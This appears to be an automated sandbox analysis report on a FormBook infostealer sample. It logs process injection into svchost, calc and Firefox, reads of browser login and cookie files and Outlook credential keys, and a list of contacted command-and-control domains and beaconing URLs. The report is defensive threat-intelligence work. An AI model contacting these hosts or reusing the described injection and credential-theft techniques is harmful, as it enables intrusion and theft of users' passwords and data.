Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\calc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: NULL target: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: NULL target: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\calc.exe

Thread register set: target process: 4780

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\calc.exe

Thread APC queued: target process: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3199008

Jump to behavior

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FE87B1 LogonUserW,

0_2_00FE87B1

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F93B3A

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00F948D7

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FF4C7F mouse_event,

0_2_00FF4C7F

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bkTW1FbgHN.exe"	Jump to behavior
Source: C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe	Process created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FE7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00FE7CAF

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FE874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00FE874B

Source: bkTW1FbgHN.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: bkTW1FbgHN.exe, uDeZXYtzetmc.exe, 00000004.00000000.1809677840.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3337151055.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3337844028.0000000000C91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: uDeZXYtzetmc.exe, 00000004.00000000.1809677840.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3337151055.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3337844028.0000000000C91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: uDeZXYtzetmc.exe, 00000004.00000000.1809677840.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3337151055.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3337844028.0000000000C91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: uDeZXYtzetmc.exe, 00000004.00000000.1809677840.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000004.00000002.3337151055.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3337844028.0000000000C91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FB862B cpuid

0_2_00FB862B

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FC4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FC4E87

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FD1E06 GetUserNameW,

0_2_00FD1E06

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FC3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00FC3F3A

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F949A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3339789975.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337814220.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337904814.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335955747.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887341354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887721953.0000000003990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1888111651.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3337603286.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\calc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: bkTW1FbgHN.exe	Binary or memory string: WIN_81
Source: bkTW1FbgHN.exe	Binary or memory string: WIN_XP
Source: bkTW1FbgHN.exe	Binary or memory string: WIN_XPe
Source: bkTW1FbgHN.exe	Binary or memory string: WIN_VISTA
Source: bkTW1FbgHN.exe	Binary or memory string: WIN_7
Source: bkTW1FbgHN.exe	Binary or memory string: WIN_8
Source: bkTW1FbgHN.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3339789975.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337814220.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337904814.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335955747.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887341354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887721953.0000000003990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1888111651.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3337603286.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01006283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_01006283
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_01006747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_01006747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bkTW1FbgHN.exe	58%	Virustotal		Browse
bkTW1FbgHN.exe	66%	ReversingLabs	Win32.Trojan.AutoitInject
bkTW1FbgHN.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.108.foundation/lnu5/	0%	Avira URL Cloud	safe
http://www.smartcongress.net/rwyw/	0%	Avira URL Cloud	safe
http://www.gk88top.top/9nv0/?QzmLxn8=dWg3C6isp4+VD88a1DBFx9aObA+xTghSwfxMZ+zxeeN7T5xq2T9IGxIaUDChQ5FgGLs4ea44SkIDXQDkT+XV66wbCmoESxYHmimpEhjR9x/TqaeLMadTIOG0BL9hL7PHyQ==&nbd8Y=hfD0	100%	Avira URL Cloud	malware
http://www.duyordu.xyz/gae2/?nbd8Y=hfD0&QzmLxn8=otss0rWhIHnhk11bHpADtP94ljsZH/GQRLn65mx6qQBII5Hy/33+pU4ua28O/MN/hGVNt5jqk6AiUDpzXtwsnMZeIw/tUiqDcE1HIDKqYpe8NoemdkbdmjFvjmoOl2KsKw==	0%	Avira URL Cloud	safe
http://www.jotchuadog.xyz/jta9/	0%	Avira URL Cloud	safe
http://www.ampsamkok88.shop	0%	Avira URL Cloud	safe
http://www.wintus.top/4woq/	0%	Avira URL Cloud	safe
http://www.duyordu.xyz/gae2/	0%	Avira URL Cloud	safe
http://www.gk88top.top/9nv0/	100%	Avira URL Cloud	malware
http://www.dating-ml-es.xyz/uxeg/?QzmLxn8=GxjMbRdPgQzN0XjXcotBxj2TfLFHu8ypKmNa5EKpEZ53nljhiE9yLLvZ3h1y+ouUdvV3oLNcZEK//dGb5DVKRCvqke0RGIMaaR0IR6fpgX04hXePp6sj2hKunKb0dr0WgA==&nbd8Y=hfD0	0%	Avira URL Cloud	safe
http://www.ampsamkok88.shop/d5ko/	0%	Avira URL Cloud	safe
https://fburl.com	0%	Avira URL Cloud	safe
http://www.108.foundation/lnu5/?nbd8Y=hfD0&QzmLxn8=QNT/15ZZU6AsGiWjSRYKkt/6S9anaGtoX8GfFyWC43f2cikt7PUu3WS46j+T51paYxuS3ixH2vbh2sKfAJw3ojfp25nO6F6qHofbl88ReUJsLvfvq1VL21AHNWbpiK3IyQ==	0%	Avira URL Cloud	safe
http://www.ampsamkok88.shop/d5ko/?QzmLxn8=47Sch4Dsymg0jF3r4GDuCB6kzGYKh0WeL2yhy5BrefofQJ2dMwfirGLwiNRn/0xtXVPtxdeSAw3k3lUcttDNE/CgCPcxlvUG/WK2ZsoqDDwcP3eNWypVGILe8DfKTq90/A==&nbd8Y=hfD0	0%	Avira URL Cloud	safe
http://www.smartcongress.net/rwyw/?QzmLxn8=tUBKVtCXMBuJNHIpFqiFgzGd5gfnYoalLGMy8MAQ+Jhmg3oHbxgD99VhXdh+qXtYYooesRAVLXyHvMNOjYpU7DvvjDJcGU7DA+zjkrEkOcvVml7XwTJpjMjN9RU0yceV1A==&nbd8Y=hfD0	0%	Avira URL Cloud	safe
http://www.dating-apps-az-dn5.xyz/oh72/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dns.ladipage.com	18.139.62.226	true	false	high
ampsamkok88.shop	3.33.130.190	true	true	unknown
smartcongress.net	146.88.233.115	true	false	high
www.dating-apps-az-dn5.xyz	199.59.243.228	true	false	high
www.gk88top.top	104.21.7.187	true	true	unknown
www.dating-ml-es.xyz	199.59.243.228	true	true	unknown
www.wintus.top	162.0.213.94	true	true	unknown
www.108.foundation	13.248.169.48	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.ampsamkok88.shop	unknown	unknown	false	high
www.jotchuadog.xyz	unknown	unknown	true	unknown
www.duyordu.xyz	unknown	unknown	true	unknown
www.smartcongress.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.smartcongress.net/rwyw/	true	Avira URL Cloud: safe	unknown
http://www.gk88top.top/9nv0/	true	Avira URL Cloud: malware	unknown
http://www.duyordu.xyz/gae2/	true	Avira URL Cloud: safe	unknown
http://www.108.foundation/lnu5/	true	Avira URL Cloud: safe	unknown
http://www.dating-ml-es.xyz/uxeg/?QzmLxn8=GxjMbRdPgQzN0XjXcotBxj2TfLFHu8ypKmNa5EKpEZ53nljhiE9yLLvZ3h1y+ouUdvV3oLNcZEK//dGb5DVKRCvqke0RGIMaaR0IR6fpgX04hXePp6sj2hKunKb0dr0WgA==&nbd8Y=hfD0	true	Avira URL Cloud: safe	unknown
http://www.wintus.top/4woq/	true	Avira URL Cloud: safe	unknown
http://www.gk88top.top/9nv0/?QzmLxn8=dWg3C6isp4+VD88a1DBFx9aObA+xTghSwfxMZ+zxeeN7T5xq2T9IGxIaUDChQ5FgGLs4ea44SkIDXQDkT+XV66wbCmoESxYHmimpEhjR9x/TqaeLMadTIOG0BL9hL7PHyQ==&nbd8Y=hfD0	true	Avira URL Cloud: malware	unknown
